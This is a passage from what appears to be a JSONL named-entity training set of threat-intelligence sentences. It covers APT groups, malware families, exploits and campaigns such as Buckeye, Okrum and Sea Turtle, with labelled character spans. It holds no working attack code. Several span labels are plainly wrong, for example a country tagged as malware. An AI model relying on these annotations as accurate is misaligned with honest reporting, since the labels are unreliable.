Windows tools .", "spans": {"THREAT_ACTOR: EvilGnome": [[39, 48]], "TOOL: SFX": [[70, 73]], "MALWARE: Windows tools": [[188, 201]]}, "info": {"id": "dnrti_train_002585", "source": "dnrti_train"}} {"text": "We can observe that the sample is very recent , created on Thursday , July 4 .", "spans": {"MALWARE: sample": [[24, 30]]}, "info": {"id": "dnrti_train_002586", "source": "dnrti_train"}} {"text": "As can be observed in the illustration above , the 
makeself script is instructed to run ./setup.sh after unpacking .", "spans": {"MALWARE: makeself script": [[51, 66]], "MALWARE: ./setup.sh": [[88, 98]]}, "info": {"id": "dnrti_train_002587", "source": "dnrti_train"}} {"text": "The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": {"MALWARE: ShooterAudio module": [[4, 23]], "TOOL: PulseAudio": [[29, 39]]}, "info": {"id": "dnrti_train_002588", "source": "dnrti_train"}} {"text": "makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": {"MALWARE: makeself.sh": [[0, 11]], "MALWARE: shell script": [[23, 35]]}, "info": {"id": "dnrti_train_002589", "source": "dnrti_train"}} {"text": "During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target .", "spans": {"THREAT_ACTOR: group": [[35, 40]]}, "info": {"id": "dnrti_train_002590", "source": "dnrti_train"}} {"text": "Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group3": [[0, 21]]}, "info": {"id": "dnrti_train_002591", "source": "dnrti_train"}} {"text": "Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]]}, "info": {"id": "dnrti_train_002592", "source": "dnrti_train"}} {"text": "The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"THREAT_ACTOR: SneakyPastes": [[28, 40]], "ORGANIZATION: embassies": [[45, 54]], "ORGANIZATION: activists": [[121, 130]], "ORGANIZATION: personnel": [[154, 163]]}, "info": {"id": "dnrti_train_002593", "source": "dnrti_train"}} 
{"text": "Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group1": [[96, 117]], "ORGANIZATION: political personnel": [[142, 161]]}, "info": {"id": "dnrti_train_002594", "source": "dnrti_train"}} {"text": "Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems .", "spans": {"THREAT_ACTOR: Gaza Cybergang Group1": [[0, 21]]}, "info": {"id": "dnrti_train_002595", "source": "dnrti_train"}} {"text": "In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[19, 33]]}, "info": {"id": "dnrti_train_002596", "source": "dnrti_train"}} {"text": "We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation .", "spans": {"THREAT_ACTOR: attacks": [[65, 72]]}, "info": {"id": "dnrti_train_002598", "source": "dnrti_train"}} {"text": "Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: ‘Ghost Dragon’": [[28, 42]], "TOOL: Gh0st RAT": [[92, 101]]}, "info": {"id": "dnrti_train_002599", "source": "dnrti_train"}} {"text": "The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim .", "spans": {"THREAT_ACTOR: Gh0st RAT 3.6": [[34, 47]], "TOOL: zlib compression": [[56, 72]]}, "info": {"id": "dnrti_train_002600", "source": 
"dnrti_train"}} {"text": "In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": {"MALWARE: Gh0st RAT": [[41, 50]], "THREAT_ACTOR: Ghost Dragon": [[61, 73]]}, "info": {"id": "dnrti_train_002601", "source": "dnrti_train"}} {"text": "SPEAR has observed numerous different XOR keys utilized by Ghost Dragon .", "spans": {"THREAT_ACTOR: Ghost Dragon": [[59, 71]]}, "info": {"id": "dnrti_train_002602", "source": "dnrti_train"}} {"text": "Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 .", "spans": {"THREAT_ACTOR: Buckeye's": [[45, 54]]}, "info": {"id": "dnrti_train_002603", "source": "dnrti_train"}} {"text": "The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]], "TOOL: Equation Group tools": [[35, 55]]}, "info": {"id": "dnrti_train_002604", "source": "dnrti_train"}} {"text": "Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability .", "spans": {"THREAT_ACTOR: Buckeye's": [[0, 9]]}, "info": {"id": "dnrti_train_002605", "source": "dnrti_train"}} {"text": "While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 .", "spans": {"THREAT_ACTOR: Buckeye": [[6, 13]], "TOOL: Equation Group tools": [[61, 81]]}, "info": {"id": "dnrti_train_002606", "source": "dnrti_train"}} {"text": "The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years .", "spans": {"THREAT_ACTOR: mysterious group": [[43, 59]]}, "info": {"id": "dnrti_train_002607", "source": "dnrti_train"}} {"text": "However , Symantec has now 
found evidence that the Buckeye cyber espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak .", "spans": {"ORGANIZATION: Symantec": [[10, 18]], "THREAT_ACTOR: Buckeye": [[51, 58]], "THREAT_ACTOR: (aka APT3": [[81, 90]], "THREAT_ACTOR: Gothic Panda": [[93, 105]], "TOOL: Equation Group tools": [[120, 140]]}, "info": {"id": "dnrti_train_002608", "source": "dnrti_train"}} {"text": "Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed .", "spans": {"THREAT_ACTOR: Equation": [[0, 8]], "TOOL: trove": [[96, 101]]}, "info": {"id": "dnrti_train_002609", "source": "dnrti_train"}} {"text": "DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar .", "spans": {"THREAT_ACTOR: DoublePulsar": [[0, 12]], "TOOL: exploit tool": [[53, 65]]}, "info": {"id": "dnrti_train_002610", "source": "dnrti_train"}} {"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec .", "spans": {"VULNERABILITY: zero-day vulnerability": [[31, 53]], "ORGANIZATION: Symantec": [[84, 92]]}, "info": {"id": "dnrti_train_002611", "source": "dnrti_train"}} {"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"THREAT_ACTOR: Bemstour": [[0, 8]], "VULNERABILITY: vulnerabilities": [[30, 45]]}, "info": {"id": "dnrti_train_002612", "source": "dnrti_train"}} {"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"VULNERABILITY: vulnerability": [[19, 32]], "THREAT_ACTOR: Shadow 
Brokers": [[211, 225]]}, "info": {"id": "dnrti_train_002613", "source": "dnrti_train"}} {"text": "It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 .", "spans": {"ORGANIZATION: Symantec": [[19, 27]]}, "info": {"id": "dnrti_train_002614", "source": "dnrti_train"}} {"text": "How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]], "TOOL: Equation Group tools": [[21, 41]]}, "info": {"id": "dnrti_train_002615", "source": "dnrti_train"}} {"text": "The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]]}, "info": {"id": "dnrti_train_002616", "source": "dnrti_train"}} {"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 .", "spans": {"VULNERABILITY: CVE-2010-3962": [[14, 27]], "VULNERABILITY: CVE-2014-1776": [[70, 83]]}, "info": {"id": "dnrti_train_002617", "source": "dnrti_train"}} {"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[54, 68]], "THREAT_ACTOR: Equation": [[130, 138]]}, "info": {"id": "dnrti_train_002618", "source": "dnrti_train"}} {"text": "Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools .", "spans": {"TOOL: DoublePulsar": [[147, 159]], "TOOL: backdoor": [[160, 168]], "TOOL: FuzzBunch": [[175, 184]], "TOOL: framework": [[185, 194]], "TOOL: EternalBlue": [[205, 216]], "TOOL: EternalSynergy": [[219, 233]], "TOOL: EternalRomance": [[240, 254]], "TOOL: 
exploit": [[255, 262]], "TOOL: tools": [[263, 268]]}, "info": {"id": "dnrti_train_002619", "source": "dnrti_train"}} {"text": "However , Buckeye had already been using some of these leaked tools at least a year beforehand .", "spans": {"THREAT_ACTOR: Buckeye": [[10, 17]], "TOOL: leaked tools": [[55, 67]]}, "info": {"id": "dnrti_train_002620", "source": "dnrti_train"}} {"text": "The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong .", "spans": {"TOOL: Equation Group tools": [[26, 46]], "THREAT_ACTOR: Buckeye": [[50, 57]]}, "info": {"id": "dnrti_train_002621", "source": "dnrti_train"}} {"text": "Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 .", "spans": {"THREAT_ACTOR: Buckeye": [[26, 33]], "THREAT_ACTOR: Shadow Brokers": [[147, 161]]}, "info": {"id": "dnrti_train_002622", "source": "dnrti_train"}} {"text": "However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware .", "spans": {"THREAT_ACTOR: Buckeye": [[41, 48]], "TOOL: Bemstour exploit tool": [[80, 101]], "TOOL: DoublePulsar": [[110, 122]]}, "info": {"id": "dnrti_train_002623", "source": "dnrti_train"}} {"text": "During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) .", "spans": {"TOOL: Buckeye malware": [[82, 97]]}, "info": {"id": "dnrti_train_002624", "source": "dnrti_train"}} {"text": "One hour later , Bemstour was used against an educational institution in Belgium .", "spans": {"MALWARE: Bemstour": [[17, 25]], "MALWARE: Belgium": [[73, 80]]}, "info": {"id": "dnrti_train_002625", "source": "dnrti_train"}} {"text": "A significantly improved variant of the Bemstour exploit tool was rolled 
out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": {"MALWARE: Bemstour": [[40, 48]]}, "info": {"id": "dnrti_train_002628", "source": "dnrti_train"}} {"text": "When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor .", "spans": {"TOOL: Bemstour": [[35, 43]], "TOOL: DoublePulsar backdoor": [[69, 90]]}, "info": {"id": "dnrti_train_002629", "source": "dnrti_train"}} {"text": "Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": {"MALWARE: Bemstour": [[0, 8]]}, "info": {"id": "dnrti_train_002630", "source": "dnrti_train"}} {"text": "Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": {"MALWARE: Bemstour": [[34, 42]]}, "info": {"id": "dnrti_train_002631", "source": "dnrti_train"}} {"text": "Development of Bemstour has continued into 2019 .", "spans": {"MALWARE: Bemstour": [[15, 23]]}, "info": {"id": "dnrti_train_002632", "source": "dnrti_train"}} {"text": "Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) .", "spans": {"MALWARE: Bemstour": [[28, 36]], "MALWARE: Pirpi": [[67, 72]], "MALWARE: backdoor": [[73, 81]], "TOOL: different": [[141, 150]], "TOOL: backdoor": [[151, 159]]}, "info": {"id": "dnrti_train_002633", "source": "dnrti_train"}} {"text": "The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": {"MALWARE: Bemstour": [[26, 34]], "ORGANIZATION: Symantec": [[43, 51]]}, "info": {"id": "dnrti_train_002634", "source": "dnrti_train"}} {"text": "Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": {"MALWARE: Filensfer": [[0, 9]]}, "info": {"id": 
"dnrti_train_002635", "source": "dnrti_train"}} {"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests .", "spans": {"ORGANIZATION: Symantec": [[49, 57]], "VULNERABILITY: (CVE-2019-0703)": [[58, 73]]}, "info": {"id": "dnrti_train_002636", "source": "dnrti_train"}} {"text": "While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": {"ORGANIZATION: Symantec": [[6, 14]], "MALWARE: Filensfer": [[45, 54]], "MALWARE: Buckeye malware": [[206, 221]], "TOOL: (Backdoor.Pirpi)": [[222, 238]]}, "info": {"id": "dnrti_train_002637", "source": "dnrti_train"}} {"text": "Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers. 
the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) .", "spans": {"MALWARE: EternalRomance": [[25, 39]], "MALWARE: EternalSynergy": [[53, 67]], "MALWARE: CVE-2017-0143": [[86, 99]], "TOOL: Buckeye exploit tool": [[213, 233]]}, "info": {"id": "dnrti_train_002639", "source": "dnrti_train"}} {"text": "It is noteworthy that the attackers never used the FuzzBunch framework in its attacks .", "spans": {"THREAT_ACTOR: attackers": [[26, 35]], "TOOL: FuzzBunch framework": [[51, 70]]}, "info": {"id": "dnrti_train_002640", "source": "dnrti_train"}} {"text": "FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 .", "spans": {"TOOL: FuzzBunch": [[0, 9]], "THREAT_ACTOR: Shadow Brokers": [[110, 124]]}, "info": {"id": "dnrti_train_002641", "source": "dnrti_train"}} {"text": "There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak .", "spans": {"THREAT_ACTOR: Buckeye": [[43, 50]], "THREAT_ACTOR: Equation Group": [[60, 74]]}, "info": {"id": "dnrti_train_002642", "source": "dnrti_train"}} {"text": "However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled .", "spans": {"ORGANIZATION: Symantec": [[54, 62]], "THREAT_ACTOR: Buckeye": [[102, 109]]}, "info": {"id": "dnrti_train_002643", "source": "dnrti_train"}} {"text": "And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": {"MALWARE: dropper": [[8, 15]], "MALWARE: iassvcs.exe": [[28, 39]]}, "info": {"id": "dnrti_train_002645", "source": "dnrti_train"}} {"text": "This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics .", "spans": {"THREAT_ACTOR: chinese APT": [[99, 110]]}, "info": {"id": "dnrti_train_002646", "source": 
"dnrti_train"}} {"text": "Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": {"MALWARE: Filensfer": [[28, 37]]}, "info": {"id": "dnrti_train_002647", "source": "dnrti_train"}} {"text": "All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash .", "spans": {"THREAT_ACTOR: group": [[71, 76]], "TOOL: Internet Explorer": [[104, 121]], "TOOL: Flash": [[126, 131]]}, "info": {"id": "dnrti_train_002648", "source": "dnrti_train"}} {"text": "According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs .", "spans": {"THREAT_ACTOR: cyberattacks": [[83, 95]]}, "info": {"id": "dnrti_train_002649", "source": "dnrti_train"}} {"text": "Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": {"MALWARE: Hussarini": [[54, 63]]}, "info": {"id": "dnrti_train_002650", "source": "dnrti_train"}} {"text": "OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": {"MALWARE: OutExtra.exe": [[0, 12]], "MALWARE: finder.exe": [[69, 79]]}, "info": {"id": "dnrti_train_002651", "source": "dnrti_train"}} {"text": "In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group .", "spans": {"ORGANIZATION: DeepSight": [[56, 65]], "THREAT_ACTOR: Buckeye": [[161, 168]]}, "info": {"id": "dnrti_train_002652", "source": "dnrti_train"}} {"text": "However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking .", "spans": {"THREAT_ACTOR: attack": [[18, 24]], 
"TOOL: DLL": [[80, 83]], "TOOL: hijacking": [[84, 93]]}, "info": {"id": "dnrti_train_002653", "source": "dnrti_train"}} {"text": "Today , this malware is still actively being used against the Philippines .", "spans": {"MALWARE: malware": [[13, 20]]}, "info": {"id": "dnrti_train_002654", "source": "dnrti_train"}} {"text": "Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 .", "spans": {"THREAT_ACTOR: APT": [[33, 36]]}, "info": {"id": "dnrti_train_002655", "source": "dnrti_train"}} {"text": "Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware .", "spans": {"THREAT_ACTOR: Iron": [[33, 37]], "TOOL: IronStealer": [[113, 124]], "TOOL: Iron ransomware": [[129, 144]]}, "info": {"id": "dnrti_train_002656", "source": "dnrti_train"}} {"text": "Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": {"MALWARE: Xagent”": [[0, 7]], "MALWARE: worm": [[83, 87]]}, "info": {"id": "dnrti_train_002657", "source": "dnrti_train"}} {"text": "Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms .", "spans": {"THREAT_ACTOR: Xagent": [[0, 6]], "THREAT_ACTOR: JbossMiner Mining": [[22, 39]]}, "info": {"id": "dnrti_train_002658", "source": "dnrti_train"}} {"text": "Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe .", "spans": {"ORGANIZATION: FireEye's": [[43, 52]], "THREAT_ACTOR: Ke3chang": [[78, 86]]}, "info": {"id": "dnrti_train_002659", "source": "dnrti_train"}} {"text": "We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum .", "spans": {"THREAT_ACTOR: Ke3chang": [[157, 
165]], "TOOL: backdoor": [[176, 184]], "TOOL: Okrum": [[194, 199]]}, "info": {"id": "dnrti_train_002660", "source": "dnrti_train"}} {"text": "Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 .", "spans": {"THREAT_ACTOR: Ke3chang": [[103, 111]], "TOOL: BS2005 backdoors": [[120, 136]], "TOOL: RoyalDNS malware": [[169, 185]], "ORGANIZATION: NCC": [[200, 203]]}, "info": {"id": "dnrti_train_002661", "source": "dnrti_train"}} {"text": "Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]]}, "info": {"id": "dnrti_train_002662", "source": "dnrti_train"}} {"text": "Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: BS2005 backdoors": [[81, 97]], "MALWARE: TidePool malware": [[141, 157]], "ORGANIZATION: Palo Alto": [[179, 188]]}, "info": {"id": "dnrti_train_002663", "source": "dnrti_train"}} {"text": "The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum .", "spans": {"TOOL: backdoor": [[81, 89]], "TOOL: Okrum": [[104, 109]]}, "info": {"id": "dnrti_train_002664", "source": "dnrti_train"}} {"text": "The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": {"MALWARE: Okrum malware": [[32, 45]], "MALWARE: backdoors": [[138, 147]]}, "info": {"id": "dnrti_train_002665", "source": "dnrti_train"}} 
{"text": "We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": {"MALWARE: Okrum backdoor": [[59, 73]], "MALWARE: Ketrican backdoor": [[93, 110]]}, "info": {"id": "dnrti_train_002666", "source": "dnrti_train"}} {"text": "In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": {"MALWARE: Okrum malware": [[54, 67]], "MALWARE: Ketrican backdoors": [[84, 102]]}, "info": {"id": "dnrti_train_002667", "source": "dnrti_train"}} {"text": "This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": {"MALWARE: RoyalDNS malware": [[51, 67]], "MALWARE: Ketrican": [[74, 82]]}, "info": {"id": "dnrti_train_002668", "source": "dnrti_train"}} {"text": "According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": {"ORGANIZATION: ESET": [[13, 17]], "MALWARE: Okrum": [[30, 35]]}, "info": {"id": "dnrti_train_002669", "source": "dnrti_train"}} {"text": "In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group .", "spans": {"ORGANIZATION: DeepSight": [[56, 65]], "THREAT_ACTOR: Buckeye": [[90, 97]]}, "info": {"id": "dnrti_train_002670", "source": "dnrti_train"}} {"text": "In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements .", "spans": {"ORGANIZATION: we": [[10, 12]]}, "info": {"id": "dnrti_train_002671", "source": "dnrti_train"}} {"text": "According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": {"MALWARE: 
Okrum": [[29, 34]]}, "info": {"id": "dnrti_train_002672", "source": "dnrti_train"}} {"text": "Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions .", "spans": {"THREAT_ACTOR: Okrum": [[65, 70]], "TOOL: keylogger": [[83, 92]], "TOOL: tools": [[95, 100]], "TOOL: enumerating network sessions": [[128, 156]]}, "info": {"id": "dnrti_train_002673", "source": "dnrti_train"}} {"text": "The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation .", "spans": {"ORGANIZATION: ClearSky": [[185, 193]]}, "info": {"id": "dnrti_train_002675", "source": "dnrti_train"}} {"text": "North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets .", "spans": {"THREAT_ACTOR: Pyongyang-affiliated hackers": [[136, 164]], "ORGANIZATION: multinational companies’": [[202, 226]]}, "info": {"id": "dnrti_train_002676", "source": "dnrti_train"}} {"text": "According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": {"ORGANIZATION: ClearSky": [[13, 21]], "MALWARE: WinRAR": [[104, 110]]}, "info": {"id": "dnrti_train_002677", "source": "dnrti_train"}} {"text": "This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[9, 22]]}, "info": {"id": "dnrti_train_002678", "source": 
"dnrti_train"}} {"text": "Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]]}, "info": {"id": "dnrti_train_002679", "source": "dnrti_train"}} {"text": "Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group .", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "THREAT_ACTOR: Lazarus": [[23, 30]], "TOOL: malicious implant": [[74, 91]], "THREAT_ACTOR: Rising Sun": [[101, 111]]}, "info": {"id": "dnrti_train_002680", "source": "dnrti_train"}} {"text": "The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002681", "source": "dnrti_train"}} {"text": "Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]], "TOOL: Invoke-PSImage": [[34, 48]]}, "info": {"id": "dnrti_train_002682", "source": "dnrti_train"}} {"text": "Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell .", "spans": {"THREAT_ACTOR: it": [[23, 25]], "TOOL: PowerShell": [[186, 196]]}, "info": {"id": "dnrti_train_002683", "source": "dnrti_train"}} {"text": "The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 
24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names .", "spans": {"ORGANIZATION: (DHS)": [[36, 41]]}, "info": {"id": "dnrti_train_002684", "source": "dnrti_train"}} {"text": "In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims .", "spans": {"ORGANIZATION: Talos": [[29, 34]]}, "info": {"id": "dnrti_train_002685", "source": "dnrti_train"}} {"text": "The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations .", "spans": {"THREAT_ACTOR: group": [[10, 15]]}, "info": {"id": "dnrti_train_002686", "source": "dnrti_train"}} {"text": "The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]]}, "info": {"id": "dnrti_train_002687", "source": "dnrti_train"}} {"text": "In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed .", "spans": {"THREAT_ACTOR: threat actors": [[16, 29]]}, "info": {"id": "dnrti_train_002688", "source": "dnrti_train"}} {"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will .", "spans": {"THREAT_ACTOR: attacker": [[6, 14]]}, "info": {"id": "dnrti_train_002690", "source": "dnrti_train"}} {"text": "If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar .", "spans": {"THREAT_ACTOR: attackers": [[7, 16]]}, "info": {"id": "dnrti_train_002691", "source": "dnrti_train"}} {"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers .", "spans": {"THREAT_ACTOR: actor": [[70, 75]]}, "info": 
{"id": "dnrti_train_002692", "source": "dnrti_train"}} {"text": "As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure .", "spans": {"THREAT_ACTOR: threat vector": [[59, 72]]}, "info": {"id": "dnrti_train_002694", "source": "dnrti_train"}} {"text": "On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar .", "spans": {"THREAT_ACTOR: actors’": [[236, 243]]}, "info": {"id": "dnrti_train_002695", "source": "dnrti_train"}} {"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries .", "spans": {"THREAT_ACTOR: actor": [[32, 37]]}, "info": {"id": "dnrti_train_002696", "source": "dnrti_train"}} {"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "TOOL: MitM servers": [[41, 53]]}, "info": {"id": "dnrti_train_002697", "source": "dnrti_train"}} {"text": "In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks .", "spans": {"TOOL: MitM server": [[19, 30]], "ORGANIZATION: Talos": [[76, 81]], "TOOL: additional servers": [[96, 114]], "THREAT_ACTOR: actor": [[132, 137]]}, "info": {"id": "dnrti_train_002698", "source": "dnrti_train"}} {"text": "The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials .", "spans": 
